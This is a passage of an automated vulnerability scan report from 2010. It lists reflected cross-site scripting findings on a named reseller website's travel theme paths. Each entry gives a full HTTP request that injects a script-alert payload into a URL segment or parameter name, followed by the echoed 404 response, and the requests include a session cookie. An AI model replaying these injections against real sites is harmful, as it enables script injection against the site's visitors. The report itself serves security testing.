<p>The requested URL /travel-vaccation551b5<script>alert(1)</script>9404917dc73/themes/ was not found on this server.</p>
...[SNIP]...

2.4828. http://www.resellerbase.com/travel-vaccation/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6e612<script>alert(1)</script>943069223f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes6e612<script>alert(1)</script>943069223f7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes6e612<script>alert(1)</script>943069223f7/ was not found on this server.</p>
...[SNIP]...

2.4829. http://www.resellerbase.com/travel-vaccation/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab33f<script>alert(1)</script>77973c19a69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/?ab33f<script>alert(1)</script>77973c19a69=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/?ab33f<script>alert(1)</script>77973c19a69=1 was not found on this server.</p>
...[SNIP]...

2.4830. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51810<script>alert(1)</script>3fd46c68ec5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation51810<script>alert(1)</script>3fd46c68ec5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation51810<script>alert(1)</script>3fd46c68ec5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4831. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f104<script>alert(1)</script>1425f843d31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes9f104<script>alert(1)</script>1425f843d31/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes9f104<script>alert(1)</script>1425f843d31/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4832. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f208d<script>alert(1)</script>81ad07909f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmosf208d<script>alert(1)</script>81ad07909f3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmosf208d<script>alert(1)</script>81ad07909f3/ was not found on this server.</p>
...[SNIP]...

2.4833. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4d780<script>alert(1)</script>3a399eff235 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/?4d780<script>alert(1)</script>3a399eff235=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/?4d780<script>alert(1)</script>3a399eff235=1 was not found on this server.</p>
...[SNIP]...

2.4834. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77754<script>alert(1)</script>4b4d9ffbce8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation77754<script>alert(1)</script>4b4d9ffbce8/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation77754<script>alert(1)</script>4b4d9ffbce8/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4835. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4aed4<script>alert(1)</script>e23e9541f59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes4aed4<script>alert(1)</script>e23e9541f59/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes4aed4<script>alert(1)</script>e23e9541f59/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4836. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62e50<script>alert(1)</script>202918db144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos62e50<script>alert(1)</script>202918db144/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos62e50<script>alert(1)</script>202918db144/images/ was not found on this server.</p>
...[SNIP]...

2.4837. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5b0b<script>alert(1)</script>e5c817b0fd2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/imagesb5b0b<script>alert(1)</script>e5c817b0fd2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/imagesb5b0b<script>alert(1)</script>e5c817b0fd2/ was not found on this server.</p>
...[SNIP]...

2.4838. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0219<script>alert(1)</script>fe2e419e0f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/?e0219<script>alert(1)</script>fe2e419e0f5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/?e0219<script>alert(1)</script>fe2e419e0f5=1 was not found on this server.</p>
...[SNIP]...

2.4839. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 222e9<script>alert(1)</script>1d032b679e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation222e9<script>alert(1)</script>1d032b679e7/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation222e9<script>alert(1)</script>1d032b679e7/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4840. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ebba4<script>alert(1)</script>5053b2fb4d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themesebba4<script>alert(1)</script>5053b2fb4d2/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themesebba4<script>alert(1)</script>5053b2fb4d2/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4841. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76516<script>alert(1)</script>9d5e6a86a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos76516<script>alert(1)</script>9d5e6a86a22/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos76516<script>alert(1)</script>9d5e6a86a22/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4842. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20e00<script>alert(1)</script>d24fa128aca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images20e00<script>alert(1)</script>d24fa128aca/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images20e00<script>alert(1)</script>d24fa128aca/rating/ was not found on this server.</p>
...[SNIP]...

2.4843. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e5ba9<script>alert(1)</script>99c00fe4b03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/ratinge5ba9<script>alert(1)</script>99c00fe4b03/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/ratinge5ba9<script>alert(1)</script>99c00fe4b03/ was not found on this server.</p>
...[SNIP]...

2.4844. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eb841<script>alert(1)</script>fe516b13485 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/?eb841<script>alert(1)</script>fe516b13485=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/?eb841<script>alert(1)</script>fe516b13485=1 was not found on this server.</p>
...[SNIP]...

2.4845. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac56a<script>alert(1)</script>ec884e2a404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationac56a<script>alert(1)</script>ec884e2a404/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationac56a<script>alert(1)</script>ec884e2a404/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4846. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 106dc<script>alert(1)</script>092b610dd12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes106dc<script>alert(1)</script>092b610dd12/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes106dc<script>alert(1)</script>092b610dd12/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4847. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9346<script>alert(1)</script>d49ef4831b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmosb9346<script>alert(1)</script>d49ef4831b1/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
